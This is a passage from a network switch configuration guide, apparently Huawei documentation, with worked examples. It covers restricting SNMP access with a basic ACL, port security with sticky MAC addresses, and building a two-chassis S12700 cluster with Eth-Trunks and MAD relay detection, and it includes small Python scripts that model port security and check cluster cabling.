An Access Control List (ACL) consists of one rule or a set of rules that describe the packet
matching conditions. These conditions include source addresses, destination addresses, and
port numbers of packets.
An ACL is a packet filter that filters packets based on rules. A device with an ACL
configured matches packets based on the rules to obtain the packets of a certain type, and then
decides to forward or discard these packets according to the policies used by the service
module to which the ACL is applied.
Depending on the rule definition methods, ACLs include basic ACL, advanced ACL, and
Layer 2 ACL. A basic ACL defines rules to filter IPv4 packets based on information such as
source IP addresses, fragment information, and time ranges. If you only need to filter packets
based on source IP addresses, you can configure a basic ACL.
In this example, a basic ACL is applied to the SNMP module so that only the specified NMS
can access the switch. This improves switch security.

Configuration Notes
This example applies to all versions and models.

Networking Requirements
As shown in Figure 12-9, a new switch is added to an enterprise's network, and uses
SNMPv1 to communicate with the NMS. To improve switch security, the switch can only be
managed by the existing NMS on the network.

Figure 12-9 Applying basic ACLs to SNMP to filter NMSs
(Topology: the NMS at 10.1.1.1/24 connects to GE1/0/1 of the Switch; GE1/0/1 is in VLAN 10, and the Switch has 10.1.1.2/24 on VLANIF 10.)


Configuration Roadmap
The configuration roadmap is as follows:
1. Configure SNMPv1 on the switch so that the NMS running SNMPv1 can manage the
switch.
2. Configure access control so that only the NMS with the specified IP address can perform
read/write operations on the specified MIB objects of the switch.
3. Configure a community name based on which the switch permits access of the NMS.
4. Configure a trap host and enable the switch to automatically send traps to the NMS.
5. Add the switch to the NMS. The community name configured on the switch must be the
same as that used by the NMS; otherwise, the NMS cannot manage the switch.

Procedure
Step 1 Configure SNMPv1 on the switch so that the NMS running SNMPv1 can manage the switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] snmp-agent sys-info version v1 //Enable SNMPv1. By default only SNMPv3 is enabled; this command adds SNMPv1 and leaves SNMPv3 enabled as well, which is why the configuration file shows version v1 v3.

Step 2 Configure access control so that only the NMS with the specified IP address can perform
read/write operations on the specified MIB objects of the switch.
# Configure an ACL to permit only the NMS 10.1.1.1 to access the switch.
[Switch] acl 2001
[Switch-acl-basic-2001] rule permit source 10.1.1.1 0 //Allow only the NMS with IP address 10.1.1.1 to access the device.
[Switch-acl-basic-2001] rule deny //Reject SNMP requests from every other source address.
[Switch-acl-basic-2001] quit

# Configure the MIB view to specify the MIB objects that can be accessed by the NMS.
[Switch] snmp-agent mib-view included isoview iso //Specify that the accessible MIB view contains the iso subtree.

Step 3 Configure a community name based on which the switch permits access of the NMS.
[Switch] snmp-agent community write adminnms01 mib-view isoview acl 2001 //Configure a read/write community name and apply the ACL to it so that the access control takes effect.

Step 4 Configure a trap host and enable the switch to automatically send traps to the NMS.
[Switch] snmp-agent trap enable
Warning: All switches of SNMP trap/notification will be open. Continue? [Y/N]:y //Enable all trap functions on the switch. By default, only some trap functions are enabled. You can run the display snmp-agent trap all command to check the trap status.
[Switch] snmp-agent target-host trap address udp-domain 10.1.1.1 params securityname adminnms01 v1 //Configure a trap host. By default, traps are sent to UDP port 162. For SNMPv1 the security name is the community name.

Step 5 Add the switch to the NMS.


Configure the SNMP function on the NMS according to the NMS manual, including setting
the SNMP version to SNMPv1, the read/write community name to adminnms01, and the
SNMP connection port number to 161 (default port used by the switch). In addition, set the
trap receiving port to port 162 (default port used by the switch) so that the NMS can receive
traps.
After the configurations are complete, the NMS can manage the switch and the switch can
automatically send traps to the NMS when events occur.


NOTE

The parameter settings on the NMS must be the same as those on the switch; otherwise, the NMS cannot manage the switch.
SNMPv1 carries the community name in cleartext and has no message authentication. ACL 2001 restricts which source address may use the community, but it does not protect the community name from being captured on the path or from source address spoofing. Where the NMS supports it, SNMPv3 with authentication and encryption provides stronger protection.

----End

Configuration Files
Configuration file of the switch
#
sysname Switch
#
acl number 2001
rule 5 permit source 10.1.1.1 0
rule 10 deny
#
snmp-agent
snmp-agent local-engineid 800007DB03360102101100
snmp-agent community write cipher %^%#.T|&Whvyf$<Gd"I,wXi5SP_6~Nakk6<<+3H:N-h@aJ6d,l0md%HCeAY8~>X=>xV\JKNAL=124r839v<*%^%# mib-view isoview acl 2001
snmp-agent sys-info version v1 v3
snmp-agent target-host trap address udp-domain 10.1.1.1 params securityname cipher %^%#uq/!YZfvW4*vf[~C|.:Cl}UqS(vXd#wwqR~5M(rU%%^%#
snmp-agent mib-view included isoview iso
snmp-agent trap enable
#
return

12.2 Example for Configuring Port Security


Port Security Overview
Port security changes the dynamic MAC addresses learned on an interface into secure MAC
addresses (dynamic secure MAC addresses, static secure MAC addresses, and sticky MAC
addresses). Once the configured number of secure MAC addresses has been learned, frames from
other source MAC addresses are not forwarded on that interface, which prevents unauthorized
users from communicating with the switch through it. Generally, port security is configured on
access devices to bind users to interfaces and control the users that can access each interface.

Compared with static MAC address entries and user-bind, which bind users statically, port
security binds users to interfaces dynamically.

Compared with DHCP snooping, which also binds users to interfaces dynamically, port security is
easier to configure. In addition, port security can limit the number of access users.

Configuration Notes
l After MAC address limiting is configured on an interface, port security cannot be
configured on the interface.
l This example applies to all versions and products.

Networking Requirements
As shown in Figure 12-10, PC1, PC2, and PC3 connect to the company network through the
switch. To improve user access security, port security is enabled on the interface of the switch
so that external users cannot use their PCs to access the company network.


Figure 12-10 Networking for configuring port security
(Topology: PC1, PC2, and PC3 connect to GE1/0/1, GE1/0/2, and GE1/0/3 of the Switch, all in VLAN 10; the Switch connects to SwitchA, which connects to the intranet.)

Configuration Roadmap
The configuration roadmap is as follows:
1. Create a VLAN to implement Layer 2 forwarding.
2. Configure port security and enable the sticky MAC function so that MAC address entries
are not lost after the device configuration is saved and the device restarts.

Procedure
Step 1 Create a VLAN on the switch and add interfaces to the VLAN. The configurations of GE1/0/2
and GE1/0/3 are similar to the configuration of GE1/0/1, and are not shown here.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan 10 //Create VLAN 10.
[Switch-vlan10] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access //The link type of an interface connected to a PC must be access. The default link type of an interface is not access, so you need to configure it manually.
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit

Step 2 Configure port security on GE1/0/1. The configurations of GE1/0/2 and GE1/0/3 are similar
to the configuration of GE1/0/1, and are not shown here.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port-security enable //Enable port security.
[Switch-GigabitEthernet1/0/1] port-security mac-address sticky //The sticky MAC function can be enabled only after port security is enabled.
[Switch-GigabitEthernet1/0/1] port-security max-mac-num 1 //Set the maximum number of secure MAC addresses. After port security is enabled, an interface can learn only one secure MAC address entry by default, so this command is optional when only one user is allowed; it does not appear in the configuration file below for that reason.

NOTE

l An interface can learn only one secure MAC address entry by default. If multiple PCs connect to the
company network using one interface, run the port-security max-mac-num command to change the
maximum number of secure MAC addresses.
l If a PC connects to the switch using an IP phone, set the maximum number of secure MAC
addresses to 3 because the IP phone occupies two MAC address entries and the PC occupies one
MAC address entry. The VLAN IDs in two MAC address entries used by the IP phone are different.
The two VLANs are used to transmit voice and data packets respectively.


Step 3 Verify the configuration.


If PC1, PC2, and PC3 are replaced by other PCs, the replacement PCs cannot access the company network, because each interface has already learned one sticky MAC address entry and discards frames from any other source MAC address. Run the display mac-address sticky command to view the learned sticky entries.
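The behaviour verified above, and the IP-phone counting rule in the NOTE to Step 2, can be followed in the following Python model. It is an added example, not Huawei code: a port with port-security enable keeps a table of secure MAC entries keyed by (MAC address, VLAN), forwards frames whose entry is known, learns new entries only until max-mac-num is reached, discards frames from any other MAC after that, and, when sticky is enabled, writes the learned entries into the saved configuration so they survive a restart. The MAC addresses and the voice VLAN 100 used below are constructed for the illustration.

```python
"""Model of port security with sticky MAC as configured in this example.
Added example, not Huawei code. MACs and VLAN numbers are constructed."""
from typing import List, Tuple


class SecurePort:
    """One interface with port-security enable. Entries are counted per
    (MAC, VLAN), which is why an IP phone that sends in a voice VLAN and in a
    data VLAN occupies two entries."""

    def __init__(self, name: str, max_mac_num: int = 1, sticky: bool = True):
        self.name = name
        self.max_mac_num = max_mac_num              # default after port-security enable is 1
        self.sticky = sticky
        self.secure: List[Tuple[str, int]] = []     # secure MAC entries in learning order
        self.dropped: List[Tuple[str, int]] = []    # frames discarded after the limit

    def receive(self, mac: str, vlan: int) -> bool:
        """Return True if a frame with this source MAC in this VLAN is forwarded."""
        key = (mac.lower(), vlan)
        if key in self.secure:
            return True
        if len(self.secure) < self.max_mac_num:
            self.secure.append(key)                 # learned as a secure MAC entry
            return True
        self.dropped.append(key)                    # limit reached: not learned, not forwarded
        return False

    def config_lines(self) -> List[str]:
        """Lines that appear under the interface in the saved configuration."""
        lines = ["port-security enable"]
        if self.sticky:
            lines.append("port-security mac-address sticky")
        if self.max_mac_num != 1:
            lines.append(f"port-security max-mac-num {self.max_mac_num}")
        if self.sticky:
            lines += [f"port-security mac-address sticky {mac} vlan {vlan}"
                      for mac, vlan in self.secure]
        return lines

    def after_restart(self) -> "SecurePort":
        """Sticky entries come back from the saved configuration; dynamic secure
        MAC entries (sticky not enabled) are lost and must be learned again."""
        port = SecurePort(self.name, self.max_mac_num, self.sticky)
        if self.sticky:
            port.secure = list(self.secure)
        return port


def simulate_pc_replacement() -> Tuple[bool, bool, bool]:
    """PC1 is learned on GE1/0/1; a replacement PC with another MAC is discarded."""
    port = SecurePort("GigabitEthernet1/0/1")
    return (port.receive("0001-0001-0001", 10),     # PC1 (constructed MAC): learned
            port.receive("0001-0001-0001", 10),     # PC1 again: already secure
            port.receive("00aa-00bb-00cc", 10))     # a different PC: dropped


def simulate_ip_phone(max_mac_num: int) -> List[bool]:
    """IP phone sending in VLAN 100 (voice) and VLAN 10 (data), plus a PC behind
    it. With the default limit of 1 only the first frame gets through."""
    port = SecurePort("GigabitEthernet1/0/2", max_mac_num)
    return [port.receive("0002-0002-0002", 100),    # phone, voice VLAN
            port.receive("0002-0002-0002", 10),     # phone, data VLAN: second entry
            port.receive("0003-0003-0003", 10)]     # PC behind the phone: third entry


if __name__ == "__main__":
    print(simulate_pc_replacement())                # (True, True, False)
    print(simulate_ip_phone(1), simulate_ip_phone(3))
    port = SecurePort("GigabitEthernet1/0/3")
    port.receive("0001-0001-0001", 10)
    print("\n".join(port.config_lines()))
```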

----End

Configuration Files
Configuration file of the switch
#
sysname Switch
#
vlan batch 10
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
port-security enable
port-security mac-address sticky
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 10
port-security enable
port-security mac-address sticky
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 10
port-security enable
port-security mac-address sticky
#
return


13 Typical CSS Configuration of Modular Switches

About This Chapter

13.1 Example for Setting Up a CSS


13.1 Example for Setting Up a CSS

CSS Overview
A cluster switch system (CSS), also called a cluster, is a logical switch consisting of two
clustering-capable switches. In addition to high forwarding performance, CSS technology
provides high reliability and scalability on a network, while simplifying network
management.
l High reliability: Member switches in a CSS work in redundancy mode. Link redundancy
can also be implemented between member switches through link aggregation.
l High scalability: Switches can set up a CSS to increase the number of ports, bandwidth,
and packet processing capabilities.
l Simplified configuration and management: After two switches set up a CSS, they are
virtualized into one device. You can log in to the CSS from either member switch to
configure and manage the entire CSS.

S12700s set up a CSS using CSS cards in SFUs. In this connection mode, member switches
are connected using dedicated CSS cards in SFUs and cluster cables. This technology is
called Cluster Switch System Generation 2 (CSS2). In addition to the existing CSS features,
CSS2 supports 1+N backup of MPUs.

1+N backup of MPUs enables a CSS to run stably as long as one MPU of any chassis in the
CSS is working normally. Compared with the service port connection mode in which each
chassis must have at least one MPU working normally, CSS2 is more reliable. Compared with
the MPU-mounted CSS card connection mode in which each chassis must have two MPUs
installed, CSS2 is more flexible.

After a CSS is set up, you are advised to perform the following configurations:
l To simplify network configuration, increase uplink bandwidth, and improve reliability,
configure inter-device Eth-Trunks in the CSS, connect downstream devices to the CSS in
dual-homing mode, and add uplink and downlink ports of the CSS to the Eth-Trunks.
l Configure the multi-active detection (MAD) function in the CSS. Two member switches
in a CSS use the same IP address and MAC address (CSS system MAC address).
Therefore, after the CSS splits, two CSSs may use the same IP address and MAC
address. To prevent this situation, a mechanism is required to check for IP address and
MAC address collision after a split. MAD is a CSS split detection protocol. When a CSS
splits due to a link failure, MAD provides split detection, multi-active handling, and fault
recovery mechanisms to minimize the impact of a CSS split on services.
MAD can be implemented in direct or relay mode. The direct and relay modes cannot be
configured simultaneously in a CSS. You can configure MAD in relay mode for a CSS
when an inter-device Eth-Trunk is configured in the CSS. The direct mode occupies
additional ports, and these ports can only be used for MAD after being connected using
common cables. Compared with the direct mode, the relay mode does not occupy
additional ports.

Software and Hardware Requirements


Table 13-1 lists software and hardware requirements on the S12700 clustering.


Table 13-1 Software and hardware requirements

Device Model: S12708 and S12712 | S12704
Software Version: V200R005C00 and later versions (S12708/S12712) | V200R008C00 and later versions (S12704)
Whether a License Is Required: No
CSS Card Model: EH1D2VS08000
CSS Card Slot:
l Subcard slot in the ET1D2SFUA000 (applicable to S12704/S12708/S12712)
l Subcard slot in the ET1D2SFUC000 (applicable to S12704/S12708)
l Subcard slot in the ET1D2SFUD000 (applicable to S12708/S12712)
Hot Swap:
l CSS card: hot swappable
l SFU: hot swappable
Hardware Configuration:
l Two member switches of the same or different models can form a CSS. For example, two S12704s can form a CSS; one S12708 and one S12712 can form a CSS.
l Each chassis must have at least one MPU and one SFU installed. You are advised to install at least two SFUs and two CSS cards in each chassis. (An S12704 can have a maximum of two SFUs and two CSS cards installed.)
l The SFUs in one chassis must be of the same model. The SFUs in the two chassis can be of different models; however, the same model is recommended.
Pluggable Modules for Ports on CSS Cards:
Electrical cable:
l 1 m SFP+ high-speed cable
l 3 m SFP+ high-speed cable
l 10 m SFP+ active high-speed cable
Optical module and fiber:
10G SFP+ optical module. The required optical fiber depends on the optical module used, and the maximum transmission distance is 80 km.
Active optical cable:
l SFP-10G-A0C3M
l SFP-10G-A0C10M

Networking Requirements
An enterprise needs to build a network that has a reliable core layer and a simple structure to
facilitate configuration and management.
To meet these requirements, S12708 core switches SwitchA and SwitchB set up a CSS using CSS
cards in SFUs. SwitchA is the master switch, and SwitchB is the standby switch. Figure 13-1
shows the network topology. Aggregation switches connect to the CSS through Eth-Trunks, and
the CSS connects to the upstream network through an Eth-Trunk.

Figure 13-1 Setting up a CSS
(Topology: SwitchE, towards the upstream network, connects GE1/0/1 and GE1/0/2 through Eth-Trunk 10 to GE1/1/0/4 and GE2/1/0/4 of the core-layer CSS formed by SwitchA and SwitchB over CSS links. At the aggregation layer, SwitchC connects GE1/0/1 and GE1/0/2 through Eth-Trunk 20 to GE1/1/0/3 and GE2/1/0/5 of the CSS, and SwitchD connects GE1/0/1 and GE1/0/2 through Eth-Trunk 30 to GE1/1/0/5 and GE2/1/0/3 of the CSS.)

Configuration Roadmap
The configuration roadmap is as follows:

1. Install CSS cards on SwitchA and SwitchB, and connect cluster cables.
2. Set the CSS connection mode on SwitchA and SwitchB and set their CSS IDs to 1 and 2
and CSS priorities to 100 and 10 respectively. These configurations ensure that SwitchA
has a higher probability to become the master switch.
3. Enable the CSS function on SwitchA and then on SwitchB to ensure that SwitchA
becomes the master switch.
4. Check whether a CSS is set up successfully.
5. Configure uplink and downlink Eth-Trunks for the CSS to improve forwarding
bandwidth and reliability.
6. Configure MAD to minimize the impact of a CSS split on the network.


Procedure
Step 1 Install hardware modules.
The following describes only the rule for connecting cluster cables between two member
switches. If you also need to install MPUs and CSS cards and learn about installation details,
see the Switch Cluster Setup Guide.
Connect cables according to the connection rules. Figure 13-2 shows the connection rules of
EH1D2VS08000 CSS cards (on the S12708). The connection rules of CSS cards on the
S12712 or S12704 are the same as those on the S12708.

Figure 13-2 EH1D2VS08000 connection rule
(Diagram: front views of two S12708 chassis. Each chassis has ET1D2SFUD000 SFUs in slots 11 to 14, each carrying an EH1D2VS08000 CSS card with eight ports numbered 1 to 8 that are divided into group 1 and group 2. The cluster cables run from each CSS card to the CSS card in the corresponding slot of the other chassis; no cable connects two cards in the same chassis.)

NOTE

l One CSS card can only be connected to one CSS card in the other chassis but not the local chassis.
l A port in group 1 of a CSS card can be connected to any port in group 1 of the CSS card on the other
chassis. The requirements for ports in group 2 are the same.
l The two chassis must be connected by one cluster cable at least.
l It is recommended that you connect the same number of cluster cables to the CSS cards (if not, the
total cluster bandwidth will be affected) and connect CSS ports on the two member switches based
on port numbers.
l If the SFU model used in the member switches is ET1D2SFUD000, it is recommended that the
number of cluster cables connected to each CSS card be an even number.

Step 2 Configure the CSS connection mode, CSS ID, and CSS priority.
# Configure the CSS function on SwitchA. Retain the default CSS connection mode (CSS
card connection) and the default CSS ID 1, and set the CSS priority to 100.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] set css priority 100

# Configure the CSS function on SwitchB. Retain the default CSS connection mode (CSS
card connection), and set the CSS ID to 2 and CSS priority to 10.


<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] set css id 2
[SwitchB] set css priority 10

# Check the CSS configuration.

NOTE

After the configuration is complete, run the display css status saved command to check the CSS
configuration.

Check the CSS configuration on SwitchA.


[SwitchA] display css status saved
Current Id Saved Id CSS Enable CSS Mode Priority Master force
------------------------------------------------------------------------------
1 1 Off CSS card 100 Off

Check the CSS configuration on SwitchB.


[SwitchB] display css status saved
Current Id Saved Id CSS Enable CSS Mode Priority Master force
------------------------------------------------------------------------------
1 2 Off CSS card 10 Off

Step 3 Enable the CSS function.


# Enable the CSS function on SwitchA and restart SwitchA.
[SwitchA] css enable
Warning: The CSS configuration will take effect only after the system is rebooted. The next CSS mode is CSS card. Reboot now? [Y/N]:y

# Enable the CSS function on SwitchB and restart SwitchB.


[SwitchB] css enable
Warning: The CSS configuration will take effect only after the system is rebooted. The next CSS mode is CSS card. Reboot now? [Y/N]:y

Step 4 Check whether a CSS is set up successfully.


# View the indicator status.
The CSS MASTER indicator on an MPU of SwitchA is steady on, indicating that the MPU is
the active MPU of the CSS and SwitchA is the master switch.
The CSS MASTER indicator on an MPU of SwitchB is off, indicating that SwitchB is the
standby switch.
# Log in to the CSS through the console port on any MPU to check whether the CSS has been
set up successfully.
<SwitchA> display device
Chassis 1 (Master Switch)
S12708's Device status:
Slot Sub Type Online Power Register Status Role
-------------------------------------------------------------------------------
5 - ET1D2G48SEC0 Present PowerOn Registered Normal NA
7 - ET1D2X16SSC0 Present PowerOn Registered Normal NA
9 - ET1D2MPUA000 Present PowerOn Registered Normal Slave
10 - ET1D2MPUA000 Present PowerOn Registered Normal Master
11 - ET1D2SFUD000 Present PowerOn Registered Normal NA
1 EH1D2VS08000 Present PowerOn Registered Normal NA
12 - ET1D2SFUD000 Present PowerOn Registered Normal NA
1 EH1D2VS08000 Present PowerOn Registered Normal NA

13 - ET1D2SFUD000 Present PowerOn Registered Normal NA
1 EH1D2VS08000 Present PowerOn Registered Normal NA
14 - ET1D2SFUD000 Present PowerOn Registered Normal NA
1 EH1D2VS08000 Present PowerOn Registered Normal NA
PWR1 - - Present PowerOn Registered Normal NA
PWR2 - - Present PowerOn Registered Normal NA
CMU2 - EH1D200CMU00 Present PowerOn Registered Normal Master
FAN1 - - Present PowerOn Registered Normal NA
FAN2 - - Present PowerOn Registered Normal NA
FAN3 - - Present PowerOn Registered Normal NA
FAN4 - - Present PowerOn Registered Normal NA
Chassis 2 (Standby Switch)
S12708's Device status:
Slot Sub Type Online Power Register Status Role
-------------------------------------------------------------------------------
3 - ET1D2G48SEC0 Present PowerOn Registered Normal NA
4 - ET1D2X16SSC0 Present PowerOn Registered Normal NA
9 - ET1D2MPUA000 Present PowerOn Registered Normal Slave
10 - ET1D2MPUA000 Present PowerOn Registered Normal Master
11 - ET1D2SFUD000 Present PowerOn Registered Normal NA
1 EH1D2VS08000 Present PowerOn Registered Normal NA
12 - ET1D2SFUD000 Present PowerOn Registered Normal NA
1 EH1D2VS08000 Present PowerOn Registered Normal NA
13 - ET1D2SFUD000 Present PowerOn Registered Normal NA
1 EH1D2VS08000 Present PowerOn Registered Normal NA
14 - ET1D2SFUD000 Present PowerOn Registered Normal NA
1 EH1D2VS08000 Present PowerOn Registered Normal NA
PWR1 - - Present PowerOn Registered Normal NA
PWR2 - - Present PowerOn Registered Normal NA
CMU1 - EH1D200CMU00 Present PowerOn Registered Normal Master
FAN1 - - Present PowerOn Registered Normal NA
FAN2 - - Present PowerOn Registered Normal NA
FAN3 - - Present PowerOn Registered Normal NA
FAN4 - - Present PowerOn Registered Normal NA
<SwitchA> display css status
CSS Enable switch On

Chassis Id CSS Enable CSS Status CSS Mode Priority Master Force
------------------------------------------------------------------------------
1 On Master CSS card 100 Off
2 On Standby CSS card 10 Off

The command output shows the card status and CSS status of both member switches,
indicating that the CSS has been set up successfully.
# Check whether CSS links are normal.
<SwitchA> display css channel
Chassis 1 || Chassis 2
--------------------------------------------------------------------------------
Num [Port] [Speed] || [Speed] [Port]
1 1/11/0/1 10G 10G 2/11/0/1
2 1/11/0/2 10G 10G 2/11/0/2
3 1/11/0/3 10G 10G 2/11/0/3
4 1/11/0/4 10G 10G 2/11/0/4
5 1/11/0/5 10G 10G 2/11/0/5
6 1/11/0/6 10G 10G 2/11/0/6
7 1/11/0/7 10G 10G 2/11/0/7
8 1/11/0/8 10G 10G 2/11/0/8
9 1/12/0/1 10G 10G 2/12/0/1
10 1/12/0/2 10G 10G 2/12/0/2
11 1/12/0/3 10G 10G 2/12/0/3
12 1/12/0/4 10G 10G 2/12/0/4
13 1/12/0/5 10G 10G 2/12/0/5
14 1/12/0/6 10G 10G 2/12/0/6
15 1/12/0/7 10G 10G 2/12/0/7
16 1/12/0/8 10G 10G 2/12/0/8
17 1/13/0/1 10G 10G 2/13/0/1
18 1/13/0/2 10G 10G 2/13/0/2
19 1/13/0/3 10G 10G 2/13/0/3

20 1/13/0/4 10G 10G 2/13/0/4
21 1/13/0/5 10G 10G 2/13/0/5
22 1/13/0/6 10G 10G 2/13/0/6
23 1/13/0/7 10G 10G 2/13/0/7
24 1/13/0/8 10G 10G 2/13/0/8
25 1/14/0/1 10G 10G 2/14/0/1
26 1/14/0/2 10G 10G 2/14/0/2
27 1/14/0/3 10G 10G 2/14/0/3
28 1/14/0/4 10G 10G 2/14/0/4
29 1/14/0/5 10G 10G 2/14/0/5
30 1/14/0/6 10G 10G 2/14/0/6
31 1/14/0/7 10G 10G 2/14/0/7
32 1/14/0/8 10G 10G 2/14/0/8
--------------------------------------------------------------------------------

The command output shows that all the CSS links are working normally, indicating that the
CSS has been set up successfully.
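The cabling rules from the NOTE to Step 1 (at least one cable, cards only linked to the other chassis, the same number of cables on every CSS card, and an even number per card with ET1D2SFUD000 SFUs) can be checked mechanically against the display css channel output. The following Python script is an added example, not Huawei code. It parses a constructed, shortened copy of the output format shown above (five links instead of 32, with slot 13 deliberately cabled with only one link) and reports every rule the cabling breaks.

```python
"""Check 'display css channel' output against the cluster cabling rules in
this example. Added example, not Huawei code; SAMPLE_OUTPUT is constructed."""
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed, shortened copy of the real output format: two cables on the
# cards in slots 11 and 12, but only one cable on the card in slot 13.
SAMPLE_OUTPUT = """\
Chassis 1                       ||        Chassis 2
--------------------------------------------------------------------------------
Num    [Port]     [Speed]       ||   [Speed]     [Port]
1      1/11/0/1   10G           ||   10G         2/11/0/1
2      1/11/0/2   10G           ||   10G         2/11/0/2
3      1/12/0/1   10G           ||   10G         2/12/0/1
4      1/12/0/2   10G           ||   10G         2/12/0/2
5      1/13/0/1   10G           ||   10G         2/13/0/1
--------------------------------------------------------------------------------
"""

# One channel line: num, chassis/slot/0/port, speed || speed, chassis/slot/0/port
LINE = re.compile(r"^\s*(\d+)\s+(\d+)/(\d+)/0/(\d+)\s+(\S+)\s*\|\|\s*(\S+)\s+(\d+)/(\d+)/0/(\d+)\s*$")

Card = Tuple[int, int]   # (chassis, slot)


def parse_channels(text: str) -> List[Dict]:
    """Return one record per cluster link; header and separator lines are skipped."""
    links = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        num, c1, s1, p1, sp1, sp2, c2, s2, p2 = m.groups()
        links.append({"num": int(num),
                      "local": (int(c1), int(s1), int(p1)), "local_speed": sp1,
                      "peer": (int(c2), int(s2), int(p2)), "peer_speed": sp2})
    return links


def check_channels(links: List[Dict], sfu_model: str = "ET1D2SFUD000") -> List[str]:
    """Apply the cabling recommendations; an empty list means nothing to fix."""
    problems = []
    if not links:
        return ["no cluster links: the two chassis must be connected by at least one cable"]
    for link in links:
        if link["local"][0] == link["peer"][0]:
            problems.append(f"link {link['num']} connects two ports in the same chassis")
        if link["local_speed"] != link["peer_speed"]:
            problems.append(f"link {link['num']} speed mismatch "
                            f"{link['local_speed']}/{link['peer_speed']}")
    per_card: Counter = Counter()
    for link in links:
        per_card[link["local"][:2]] += 1
        per_card[link["peer"][:2]] += 1
    if len(set(per_card.values())) > 1:
        problems.append("cable count differs between CSS cards, which reduces total "
                        f"cluster bandwidth: {dict(per_card)}")
    if sfu_model == "ET1D2SFUD000":
        for (chassis, slot), n in sorted(per_card.items()):
            if n % 2:
                problems.append(f"chassis {chassis} slot {slot} has an odd number of cables ({n})")
    return problems


if __name__ == "__main__":
    found = parse_channels(SAMPLE_OUTPUT)
    print(f"{len(found)} cluster links")
    for problem in check_channels(found) or ["cabling follows the recommendations"]:
        print("-", problem)
```

Run against the full 32-link output above, the check returns nothing: every card in slots 11 to 14 carries eight cables to the same slot in the other chassis, and all links are 10G on both ends.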
Step 5 Configure Eth-Trunks between the CSS and its upstream and downstream devices.
# Configure an Eth-Trunk in the CSS and add uplink ports to the Eth-Trunk.
<SwitchA> system-view
[SwitchA] sysname CSS //Rename the CSS.
[CSS] interface eth-trunk 10
[CSS-Eth-Trunk10] quit
[CSS] interface gigabitethernet 1/1/0/4
[CSS-GigabitEthernet1/1/0/4] eth-trunk 10
[CSS-GigabitEthernet1/1/0/4] quit
[CSS] interface gigabitethernet 2/1/0/4
[CSS-GigabitEthernet2/1/0/4] eth-trunk 10
[CSS-GigabitEthernet2/1/0/4] quit

# Configure an Eth-Trunk in the CSS and add the downlink ports connected to SwitchC to the
Eth-Trunk.
[CSS] interface eth-trunk 20
[CSS-Eth-Trunk20] quit
[CSS] interface gigabitethernet 1/1/0/3
[CSS-GigabitEthernet1/1/0/3] eth-trunk 20
[CSS-GigabitEthernet1/1/0/3] quit
[CSS] interface gigabitethernet 2/1/0/5
[CSS-GigabitEthernet2/1/0/5] eth-trunk 20
[CSS-GigabitEthernet2/1/0/5] quit

# Configure an Eth-Trunk in the CSS and add the downlink ports connected to SwitchD to the
Eth-Trunk.
[CSS] interface eth-trunk 30
[CSS-Eth-Trunk30] quit
[CSS] interface gigabitethernet 1/1/0/5
[CSS-GigabitEthernet1/1/0/5] eth-trunk 30
[CSS-GigabitEthernet1/1/0/5] quit
[CSS] interface gigabitethernet 2/1/0/3
[CSS-GigabitEthernet2/1/0/3] eth-trunk 30
[CSS-GigabitEthernet2/1/0/3] return

# Configure an Eth-Trunk on SwitchE and add member ports to the Eth-Trunk.
<HUAWEI> system-view
[HUAWEI] sysname SwitchE
[SwitchE] interface eth-trunk 10
[SwitchE-Eth-Trunk10] quit
[SwitchE] interface gigabitethernet 1/0/1
[SwitchE-GigabitEthernet1/0/1] eth-trunk 10
[SwitchE-GigabitEthernet1/0/1] quit
[SwitchE] interface gigabitethernet 1/0/2
[SwitchE-GigabitEthernet1/0/2] eth-trunk 10
[SwitchE-GigabitEthernet1/0/2] quit

# Configure an Eth-Trunk on SwitchC and add member ports to the Eth-Trunk.
<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] interface eth-trunk 20
[SwitchC-Eth-Trunk20] quit
[SwitchC] interface gigabitethernet 1/0/1
[SwitchC-GigabitEthernet1/0/1] eth-trunk 20
[SwitchC-GigabitEthernet1/0/1] quit
[SwitchC] interface gigabitethernet 1/0/2
[SwitchC-GigabitEthernet1/0/2] eth-trunk 20
[SwitchC-GigabitEthernet1/0/2] quit

# Configure an Eth-Trunk on SwitchD and add member ports to the Eth-Trunk.
<HUAWEI> system-view
[HUAWEI] sysname SwitchD
[SwitchD] interface eth-trunk 30
[SwitchD-Eth-Trunk30] quit
[SwitchD] interface gigabitethernet 1/0/1
[SwitchD-GigabitEthernet1/0/1] eth-trunk 30
[SwitchD-GigabitEthernet1/0/1] quit
[SwitchD] interface gigabitethernet 1/0/2
[SwitchD-GigabitEthernet1/0/2] eth-trunk 30
[SwitchD-GigabitEthernet1/0/2] quit

# Verify the configuration.
After the configuration is complete, run the display trunkmembership eth-trunk command
in any view to check information about Eth-Trunk member ports. For example, the following
command output shows the member ports of Eth-Trunk 10:
<CSS> display trunkmembership eth-trunk 10
Trunk ID: 10
Used status: VALID
TYPE: ethernet
Working Mode : Normal
Number Of Ports in Trunk = 2
Number Of Up Ports in Trunk = 2
Operate status: up

Interface GigabitEthernet1/1/0/4, valid, operate up, weight=1
Interface GigabitEthernet2/1/0/4, valid, operate up, weight=1

Step 6 Configure the MAD function. The following procedure configures MAD in relay mode and
configures SwitchC as the relay agent.
# In the CSS, configure MAD in relay mode for the inter-device Eth-Trunk.
<CSS> system-view
[CSS] interface eth-trunk 20
[CSS-Eth-Trunk20] mad detect mode relay
[CSS-Eth-Trunk20] quit
[CSS] quit

# Configure the MAD proxy function on SwitchC.
[SwitchC] interface eth-trunk 20
[SwitchC-Eth-Trunk20] mad relay
[SwitchC-Eth-Trunk20] quit
[SwitchC] quit

# Verify the configuration.
Check the MAD configuration in the CSS.
<CSS> display mad
Current MAD domain: 0
MAD direct detection enabled: NO
MAD relay detection enabled: YES

Check MAD proxy information on SwitchC.
<SwitchC> display mad proxy
Mad relay interfaces configured:
